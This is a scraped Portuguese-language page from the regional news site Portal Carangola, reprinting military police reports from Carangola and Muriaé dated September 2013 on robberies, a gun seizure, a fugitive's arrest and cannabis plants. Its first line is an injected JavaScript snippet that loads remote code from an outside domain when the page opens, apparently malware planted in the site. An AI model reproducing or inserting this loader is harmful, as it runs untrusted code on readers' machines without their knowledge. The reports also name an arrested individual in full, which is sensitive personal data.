;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências Policiais em Destaque-23/09/2013 - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências Policiais em Destaque-23/09/2013

pmbn

75ª CIA PM – CARANGOLA-MG.

ROUBO CONSUMADO A TRANSEUNTE EM CARANGOLA-MG.

Em 22/09/2013 às 17h30min, policiais compareceram a AV. MACHADO DE ASSIS, BAIRRO TRIÂNGULO, onde a vítima o adolescente de 16 anos estava, e em dado momento aproximou-se dele o autor de 29 anos, VULGO PRETO, o qual perguntou “o que você tem aí?”, e o adolescente respondido que teria somente uma bicicleta, tendo o autor de posse de uma faca, retirado do bolso do adolescente um celular marca Samsung  Galaxy, cor preta, além de efetuar-lhe um golpe no pescoço, jogando-o ao chão. Em seguida o autor evadiu em um táxi de cor vermelha, sendo realizado um intenso rastreamento, sendo o autor localizado e preso em flagrante, e sendo encontrado com ele R$ 11,00 em moeda corrente, e o adolescente foi conduzido ao PAM, sendo constatado escoriações no abdômen, já o autor negou as acusações alegando que o adolescente é usuário de CRACK , e que trocou o celular em três pedras de CRACK, e entregou duas das pedras ao adolescente e que ficou com uma.

            76ª CIA PM – MURIAÉ-MG.

           PORTE ILEGAL DE ARMA DE FOGO EM MURIAE.

            Em 22/09/2013 às 16h52min, na RUA CAPITÃO JOÃO FELISBERTO, BAIRRO BARRA, MURIAÉ, militares em patrulhamento receberam informações via 190, dando conta que na citada rua, próximo ao rio, havia um individuo de cor branca, trajando bermuda tectel e boné preto, sendo certo que tal individuo estava com uma camisa vermelha enrolada na mão, e enrolado na camisa estava uma arma de fogo, a qual ele exibia em via publica. Pelo local, os militares fizeram um cerco, com intuito de evitar que tal individuo conseguisse evadir, momento que o autor ao perceber a presença dos policiais, dispensou uma camisa vermelha, em um lote vago, sendo imediatamente abordado, contudo nada de anormal foi constatado, sendo que em buscas no mencionado lote vago, foi localizado uma blusa vermelha que ele havia dispensado, e encontrado uma garrucha sem marca aparente, cal .32 desmuniciada. Foi dado voz de apreensão em flagrante delito ao adolescente infratos de 16 anos, que foi encaminhado para à DPJ para as demais providencias juntamente com sua genitora. O menor informou que portava a arma haja vista que está sendo constantemente ameaçado de morte, sendo que já fora apreendido outras vezes pelo cometimento do ato infracional de porte de arma de fogo.

FORAGIDO DA JUSTIÇA EM MURIAÉ-MG.

Em 22/09/2013 às 17h50min, na RUA LUIZ PINTO COELHO SECUNHO, SÃO CRISTÓVÃO, militares receberam informações que, um individuo de cor negra estaria tentando pular o muro de varias residências, inclusive em uma delas o mesmo já estava em cima da laje, tentando adentrar em uma residência, mais ao ser avistado pelos moradores, o mesmo se assustou vindo a pular da Lage, de uma altura de 6 metros aproximadamente.    Quando os militares chegaram ao local fizeram um rastreamento e abordaram o individuo suspeito que estava na citada rua, sendo identificado  como JOÃO LUIZ TEIXEIRA JUNIOR, 39 anos, vulgo DÃO. Individuo este já conhecido no meio policial, pela pratica de diversos furtos na cidade. Inclusive na data de 21/09/2013, o mesmo havia praticado um furto no bairro da barra, sendo que na atual data foi constatado um mandado de prisão em aberto em seu desfavor, tendo o autor relatado que, uma vez que ao tentar foragir de populares deparou com uma cerca de arame farpado, veio a causar lesões pelo corpo, sendo conduzido ate o Hospital São Paulo, onde foi atendido pelo medico de plantão e posteriormente foi conduzido para a Delegacia de Policia de plantão para as demais providencias de praxe.

b>

b>

ROUBO CONSUMADO À ESTABELECIMENTO COMERCIAL EM MURIAÉ-MG.

Em 22/09/2013 às 13h52min, no BAIRRO  BARRA, militares compareceram em uma padaria, onde em contato com o proprietário de 61 anos, este relatado que por volta 13h40min, estava no caixa do seu comércio momento que chegou pelo local dois indivíduos, sendo um negro alto e outro moreno baixo, tendo o indivíduo moreno baixo portando uma faca passou ameaçá-lo de morte, enquanto o indivíduo negro alto subtraiu a quantia aproximada de R$ 161,00 reais em dinheiro; que em seguida os infratores evadiram do local tomando sentido à RUA JOSÉ EUTRÓPIO e em seguida rumo ignorado. Durante rastreamento os militares foram informados que os supracitados indivíduos estavam chegando no terminal rodoviário, onde entraram em um táxi VW/GOL G6, COR PRATA, e tomaram rumo ignorado. Mediante tal informação foi rastreado o referido veículo, tendo tal veículo sido localizado e abordado no trevo da BR 356 do bairro PORTO, ocasião que foi encontrado na posse do autor de 20 anos, vulgo “BEIRA-MAR” toda quantia subtraída do estabelecimento comercial, bem como uma faca com aproximadamente vinte centímetro de lamina com cabo de madeira, que foi utilizado no roubo; que também foi encontrado em companhia do citado autor o adolescente 17 anos, que também participou do roubo. O autor de 20 anos recebeu voz de prisão em flagrante delito e o adolescente recebeu voz de apreensão em flagrante, sendo ambos encaminhado para a 4ª DRPC para as demais providencias de praxe. Beira-mar foi autuado em flagrante, sendo reincidente na prática de roubo na mesma padaria em data de 25/10/2012.

APREENSSÃO DE SUBSTÂNCIA ENTORPECENTE EM MURIAÉ-MG.

Em 22/09/2013 às 14h00min, na RUA JHON CARDOSO DE MELO, S/Nº, CARDODO DE MELO, MURIAÉ, militares durante realização de operação contra os maus tratos a semoventes, em patrulhamento pelo bairro mencionado, deslocaram até uma pastagem atrás da caixa d’agua do DEMSUR, ao final da RUA JOHN CARDOSO, e durante a vistoria, visualizaram entre uma moita de “espertas”, várias garrafas plástica cortadas ao meio, e com adubo e terra em seu interior, tal fato chamou a atenção e ao vistoriar, foi localizado um vazo de plástico preto, e em seu interior 04 pés de uma planta muito semelhante à maconha. No local não havia nenhuma pessoa, devido se tratar de uma área isolada do bairro. Sendo a planta apreendida e encaminhada para a Delegacia de Polícia.

Fonte:ASSESSORIA DE COMUNICAÇÃO DO 47° BPM – MURIAÉ / MG

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.